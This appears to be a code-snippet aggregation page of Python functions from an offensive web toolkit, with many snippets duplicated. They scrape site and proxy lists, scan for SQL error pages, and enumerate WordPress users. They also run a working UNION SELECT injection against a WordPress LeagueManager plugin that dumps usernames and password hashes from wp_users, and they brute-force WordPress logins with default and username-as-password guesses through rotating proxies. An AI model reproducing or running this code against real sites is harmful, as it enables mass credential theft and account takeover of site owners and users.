Example #1
0
def base_scrape_alexa(url, browser_args, out_name, add_http):
	b = Browser(name, **browser_args)
	r = b.go(url)

	zip_file = StringIO(r.content)
	z = ZipFile(zip_file, 'r')
	csv_file = 'top-1m.csv'
	z.extract(csv_file, out_dir)

	file_path = path.join(out_dir, csv_file)
	lines = strip_open(file_path)

	out_path = path.join(out_dir, out_name)
	if add_http:
		os.remove(file_path)
		with open(out_path, 'w+') as f:
			for line in lines:
				print >> f, 'http://' + line.split(',')[1]
	else:
		try:
			os.rename(file_path, out_path)
		except Exception as e:
			pass

	return len(lines)
Example #2
0
def base_sqli_dump(num, browser_args, url, ident, left, right, attempts):
	b = Browser(url, **browser_args)

	r = b.go(url.replace(ident,str(num)))
	match = findall('{}(.*){}'.format(left,right), r.text)

	if match:
		return match[0]
	return attempts
Example #3
0
def scan_js(url, browser_args):
	b = Browser(name, **browser_args)
	r = b.go(url)

	files = []
	for link in findall('http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', r.text):
		if link.endswith('.js'):
			files.append(link)
	return files
Example #4
0
def base_sqli_dump(num, browser_args, url, ident, left, right, attempts):
    b = Browser(url, **browser_args)

    r = b.go(url.replace(ident, str(num)))
    match = findall('{}(.*){}'.format(left, right), r.text)

    if match:
        return match[0]
    return attempts
Example #5
0
def base_check_keyword(link, browser_args, keywords, check_url=False):
    b = Browser(name, **browser_args)
    r = b.go(link)

    if any(x in r.text for x in keywords):
        return r.url
    if check_url:
        if any(x in r.url for x in keywords):
            return r.url
    return ''
Example #6
0
def base_sqli_scan(url, browser_args):
    b = Browser(name, **browser_args)

    sqli_keys = [['sql', 'syntax'], ['syntax', 'error'], ['sql', 'error'],
                 ['query', 'failed'], ['incorrect', 'syntax']]

    r = b.go(url)

    if any(all(key in r.text for key in sub) for sub in sqli_keys):
        return url
Example #7
0
def base_check_keyword(link, browser_args, keywords, check_url=False):
	b = Browser(name, **browser_args)
	r = b.go(link)

	if any(x in r.text for x in keywords):
		return r.url
	if check_url:
		if any(x in r.url for x in keywords):
			return r.url
	return ''
Example #8
0
def scan_js(url, browser_args):
    b = Browser(name, **browser_args)
    r = b.go(url)

    files = []
    for link in findall(
            'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+',
            r.text):
        if link.endswith('.js'):
            files.append(link)
    return files
Example #9
0
def base_wp_leaguemanager(url, browser_args):
    b = Browser(name, **browser_args)

    params = {'league_id' : '7 UNION SELECT ALL user_login,2,3,4,5,6,7,8,9,10,11,12,13,user_pass,15,16,17,18,19,20,21,22,23,24 from wp_users--',
                'mode' : 'teams',
                'leaguemanager_export' : 'Download+File'}
    r = b.go(url, data=params)

    match = findall('21\t(.*)\t2.*0\t(.*)\t15', r.text)
    if match:
        return ':'.join(match[0])
Example #10
0
def base_check_proxy(proxy, browser_args, target_site, target_key):
	b = Browser(name, change_proxy=False, max_retries=2, max_timeouts=2, **browser_args)

	bad = False
	try:
		r = b.go(target_site, proxy=proxy)
	except Exception as e:
		return

	if r.ok and target_key in r.text:
		return proxy
Example #11
0
def wp_init(url, browser_args, job_name, out_name):
    params = base_wp_init(url, browser_args)

    b = Browser(name, **browser_args)
    r = b.go(url, data=params)

    if WP_GDKEY in r.text:
        celery_output.delay(out_format(out, params), name, job_name, out_name)      
    elif WP_BUSER in r.text:
        wp_user.delay(url, browser_args, job_name, out_name, params)
    else:
        wp_brute.delay(url, browser_args, job_name, out_name, params, 1)
Example #12
0
def wp_init(url, browser_args, job_name, out_name):
    params = base_wp_init(url, browser_args)

    b = Browser(name, **browser_args)
    r = b.go(url, data=params)

    if WP_GDKEY in r.text:
        celery_output.delay(out_format(out, params), name, job_name, out_name)
    elif WP_BUSER in r.text:
        wp_user.delay(url, browser_args, job_name, out_name, params)
    else:
        wp_brute.delay(url, browser_args, job_name, out_name, params, 1)
Example #13
0
def base_scan_dom(url, browser_args):
    b = Browser(name, **browser_args)

    r = b.go(url)

    if url.endswith('.js'):
        return _scan_dom(r.text)

    matches = []
    doc = html.document_fromstring(r.text)
    for elem in doc.xpath('//script'):
        matches.extend(_scan_dom(elem.text_content()))
    return matches
Example #14
0
def base_scan_dom(url, browser_args):
	b = Browser(name, **browser_args)

	r = b.go(url)

	if url.endswith('.js'):
		return _scan_dom(r.text)

	matches = []
	doc = html.document_fromstring(r.text)
	for elem in doc.xpath('//script'):
		matches.extend(_scan_dom(elem.text_content()))
	return matches	
Example #15
0
def base_scrape_headers(link, browser_args, match):
    b = Browser(name, **browser_args)

    r = b.go(link)
    
    if not match:
        return dict(r.headers)
    matches = {}
    for field in match:
        value = r.headers.get(field)
        if value:
            matches[field] = value
    return matches
Example #16
0
def base_scrape_headers(link, browser_args, match):
    b = Browser(name, **browser_args)

    r = b.go(link)

    if not match:
        return dict(r.headers)
    matches = {}
    for field in match:
        value = r.headers.get(field)
        if value:
            matches[field] = value
    return matches
Example #17
0
def base_scrape_quantcast(num, browser_args):
    b = Browser(name, **browser_args)
    url = "http://www.quantcast.com/top-sites/US/{}".format(num)
    r = b.go(url)

    site = lxml.html.document_fromstring(r.text)
    site.make_links_absolute(r.url)
    links = site.find_class("twoColumn")[0]

    output = []
    for element, attribute, uri, pos in links.iterlinks():
        if attribute == "href":
            output.append("http://" + element.text)
    return output
Example #18
0
def base_sqli_scan(url, browser_args):
	b = Browser(name, **browser_args)

	sqli_keys = [	['sql','syntax'],
					['syntax','error'],
					['sql', 'error'],
					['query', 'failed'],
					['incorrect', 'syntax']
				]

	r = b.go(url)

	if any( all(key in r.text for key in sub) for sub in sqli_keys):
		return url
Example #19
0
def base_scrape_quantcast(num, browser_args):
    b = Browser(name, **browser_args)
    url = 'http://www.quantcast.com/top-sites/US/{}'.format(num)
    r = b.go(url)

    site = lxml.html.document_fromstring(r.text)
    site.make_links_absolute(r.url)
    links = site.find_class('twoColumn')[0]

    output = []
    for element, attribute, uri, pos in links.iterlinks():
        if attribute == 'href':
            output.append('http://' + element.text)
    return output
Example #20
0
def base_wp_leaguemanager(url, browser_args):
    b = Browser(name, **browser_args)

    params = {
        'league_id':
        '7 UNION SELECT ALL user_login,2,3,4,5,6,7,8,9,10,11,12,13,user_pass,15,16,17,18,19,20,21,22,23,24 from wp_users--',
        'mode': 'teams',
        'leaguemanager_export': 'Download+File'
    }
    r = b.go(url, data=params)

    match = findall('21\t(.*)\t2.*0\t(.*)\t15', r.text)
    if match:
        return ':'.join(match[0])
Example #21
0
def base_scan_wp(url, browser_args):
	WP_LOGIN = '******'
	WP_VALID = ['loginform']
	WP_CAPCH = ['cptch_block']

	b = Browser(name, **browser_args)

	if not url.endswith(WP_LOGIN):
		url = urljoin(url, WP_LOGIN)
	try:
		r = b.go(url)
	except Exception as e:
		return

	if r.ok and all(x in r.text for x in WP_VALID) and not any(x in r.text for x in WP_CAPCH):
		return url
Example #22
0
def base_wp_init(url, browser_args):
    b = Browser(name, **browser_args)
    r = b.go(url)

    params = {'log': 'admin', 'wp_submit': 'Log In', 'pwd': 'admin'}

    redirect = findall(
        '"redirect_to" value="([\w\d\:\.\/\-\=\&\%\+;\_\?\#\;\,]*)"', r.text)
    testcook = findall(
        '"testcookie" value="([\w\d\:\.\/\-\=\&\%\+;\_\?\#\;\,]*)"', r.text)

    if redirect:
        params['redirect_to'] = redirect[0]
    if testcook:
        params['testcookie'] = testcook[0]

    return params
Example #23
0
def base_wp_init(url, browser_args):
    b = Browser(name, **browser_args)
    r = b.go(url)

    params = {  'log'       :   'admin',
                'wp_submit' :   'Log In',
                'pwd'       :   'admin'}

    redirect = findall('"redirect_to" value="([\w\d\:\.\/\-\=\&\%\+;\_\?\#\;\,]*)"', r.text)
    testcook = findall('"testcookie" value="([\w\d\:\.\/\-\=\&\%\+;\_\?\#\;\,]*)"', r.text)

    if redirect:
        params['redirect_to'] = redirect[0]
    if testcook:
        params['testcookie'] = testcook[0]

    return params
Example #24
0
def base_scan_wp(url, browser_args):
    WP_LOGIN = '******'
    WP_VALID = ['loginform']
    WP_CAPCH = ['cptch_block']

    b = Browser(name, **browser_args)

    if not url.endswith(WP_LOGIN):
        url = urljoin(url, WP_LOGIN)
    try:
        r = b.go(url)
    except Exception as e:
        return

    if r.ok and all(x in r.text
                    for x in WP_VALID) and not any(x in r.text
                                                   for x in WP_CAPCH):
        return url
Example #25
0
def base_find_user(url, browser_args, params):  
    WP_LOGIN = '******'
    b = Browser(name, **browser_args)

    url_author = url.replace(WP_LOGIN, '?author=1')
    r = b.go(url_author)

    user = ''
    if 'author/' in r.url:
        user = findall('author\/([\d\w\-]+)\/', r.url + '/')[0]
    elif 'archive author author-' in r.text:
        pos_user = findall('archive author author-([\d\w\-]+)', r.text)
        if pos_user:
            user = pos_user[0]      
    if not user:
        return

    params['log'] = user
    params['pwd'] = user
    return params
Example #26
0
def base_find_user(url, browser_args, params):
    WP_LOGIN = '******'
    b = Browser(name, **browser_args)

    url_author = url.replace(WP_LOGIN, '?author=1')
    r = b.go(url_author)

    user = ''
    if 'author/' in r.url:
        user = findall('author\/([\d\w\-]+)\/', r.url + '/')[0]
    elif 'archive author author-' in r.text:
        pos_user = findall('archive author author-([\d\w\-]+)', r.text)
        if pos_user:
            user = pos_user[0]
    if not user:
        return

    params['log'] = user
    params['pwd'] = user
    return params
Example #27
0
def base_link_scraper(link, browser_args, past, include_external):
    b = Browser(name, **browser_args)

    past.append(link)
    r = b.go(link)

    doc = lxml.html.document_fromstring(r.text)

    doc.make_links_absolute(r.url)
    root = urlparse(r.url).netloc
    output = []
    for element, attribute, uri, pos in doc.iterlinks():
        if attribute != 'href' or uri in past:
            continue
        past.append(uri)
        url_is_external = urlparse(uri).netloc != root
        include_external = include_external or not url_is_external

        if include_external:
            output.append(uri)
    return output
Example #28
0
def base_scrape_proxy(num, browser_args):
    b = Browser(name, **browser_args)
    url = 'http://hidemyass.com/proxy-list/{}'.format(num)
    r = b.go(url)

    doc = lxml.html.document_fromstring(r.text)
    table = doc.get_element_by_id('listtable')
    rows = table.getchildren()[1:]

    ips = []
    for row in rows:
        columns = row.getchildren()
        port = columns[2].text_content().strip()
        info = columns[1].getchildren()[0].getchildren()
        style = lxml.html.tostring(info[0])

        bad_styles = []
        for css in style.splitlines()[1:-1]:
            if 'none' in css:
                bad_styles.append(css.split('{')[0][1:])

        ip = ''
        tricky_style = re.findall('<\/style>(\d{1,3})', style)
        if tricky_style:
            ip += tricky_style[0] + '.'
        for span in info[1:]:
            span_html = lxml.html.tostring(span)
            tricky_html = re.findall('(?:<\/span>|<\/div>)\.?(\d{1,3})',
                                     span_html)
            if tricky_html:
                ip += tricky_html[0] + '.'
            if 'none' not in span_html and not any(bad in span_html
                                                   for bad in bad_styles):
                span_text = span.text_content()
                if re.search('\d', span_text):
                    ip += span_text + '.'
        ips.append(ip[:-1] + ':' + port)
    return ips
Example #29
0
def init_wp(self, my_link):
    if my_link.pwd:
        return do_brute(my_link)

    try:
        params = base_wp_init(my_link.item, self.browser_args)
    except Exception as e:
        return self.error_catch('wp init', my_link, e)

    b = Browser(name, **self.browser_args)
    r = b.go(my_link.item, data=params)

    if not all(x in r.text for x in WP_VALID):
        return

    if WP_GDKEY in r.text:
        return self.output.append(out_format(my_link.item, params))
    elif WP_BUSER in r.text:
        params = base_find_user(my_link.item, self.browser_args, params)
        if not params:
            return
    my_link.params = params
    self.to_input.append(my_link)
Example #30
0
def init_wp(self, my_link):
    if my_link.pwd:
        return do_brute(my_link)
    
    try:
        params = base_wp_init(my_link.item, self.browser_args)
    except Exception as e:
        return self.error_catch('wp init', my_link, e)
        
    b = Browser(name, **self.browser_args)
    r = b.go(my_link.item, data=params)

    if not all(x in r.text for x in WP_VALID):
        return

    if WP_GDKEY in r.text:
        return self.output.append(out_format(my_link.item, params))
    elif WP_BUSER in r.text:
        params = base_find_user(my_link.item, self.browser_args, params)
        if not params:
            return
    my_link.params = params
    self.to_input.append(my_link)
Example #31
0
def base_scrape_proxy(num, browser_args):
    b = Browser(name, **browser_args)
    url = "http://hidemyass.com/proxy-list/{}".format(num)
    r = b.go(url)

    doc = lxml.html.document_fromstring(r.text)
    table = doc.get_element_by_id("listtable")
    rows = table.getchildren()[1:]

    ips = []
    for row in rows:
        columns = row.getchildren()
        port = columns[2].text_content().strip()
        info = columns[1].getchildren()[0].getchildren()
        style = lxml.html.tostring(info[0])

        bad_styles = []
        for css in style.splitlines()[1:-1]:
            if "none" in css:
                bad_styles.append(css.split("{")[0][1:])

        ip = ""
        tricky_style = re.findall("<\/style>(\d{1,3})", style)
        if tricky_style:
            ip += tricky_style[0] + "."
        for span in info[1:]:
            span_html = lxml.html.tostring(span)
            tricky_html = re.findall("(?:<\/span>|<\/div>)\.?(\d{1,3})", span_html)
            if tricky_html:
                ip += tricky_html[0] + "."
            if "none" not in span_html and not any(bad in span_html for bad in bad_styles):
                span_text = span.text_content()
                if re.search("\d", span_text):
                    ip += span_text + "."
        ips.append(ip[:-1] + ":" + port)
    return ips
Example #32
0
def base_wp_brute(url, browser_args, params):
    b = Browser(name, **browser_args)
    r = b.go(url, data=params)

    if WP_GDKEY in r.text:
        return url
Example #33
0
def base_wp_brute(url, browser_args, params):
    b = Browser(name, **browser_args)
    r = b.go(url, data=params)

    if WP_GDKEY in r.text:
        return url